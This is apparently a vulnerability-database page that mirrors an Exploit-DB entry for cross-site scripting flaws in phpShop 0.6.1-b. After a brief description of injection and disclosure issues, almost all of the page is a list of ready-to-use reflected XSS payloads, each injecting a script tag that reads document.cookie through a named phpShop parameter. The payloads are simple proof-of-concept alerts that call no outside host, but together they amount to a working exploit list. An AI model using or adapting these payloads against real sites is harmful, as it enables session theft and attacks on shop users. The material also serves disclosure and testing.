phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054366 漏洞类型
发布时间 2004-01-16 更新时间 2004-01-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23546
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9437/info

Multiple vulnerabilities have been reported to exist in the software that may allow an attacker to carry out attacks against the database, disclose sensitive information, and execute HTML or script code in a user's browser. The issues include SQL injection, cross-site scripting, HTML injection, and information disclosure.

page=admin/index&GulfTech="><script>alert(document.cookie)</script>
page=shop/browse&category_id="><script>alert(document.cookie)</script>
func="><script>alert(document.cookie)</script>
login="><script>alert(document.cookie)</script>
page=account/shipto&user_info_id="><script>alert(document.cookie)</script>
page=shopper/index&module_description="><script>alert(document.cookie)</script>
page=shopper/menu&menu_label="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_list_mn="><script>alert(document.cookie)</script>
page=shopper/menu&modulename="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_group_list_mnu="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_group_form_mnu="><script>alert(document.cookie)</script>
page=vendor/index&module_description="><script>alert(document.cookie)</script>
page=vendor/index&menu_label="><script>alert(document.cookie)</script>
page=vendor/index&sess="><script>alert(document.cookie)</script>
page=vendor/index&leftbar_title_bgcolor="><script>alert(document.cookie)</script>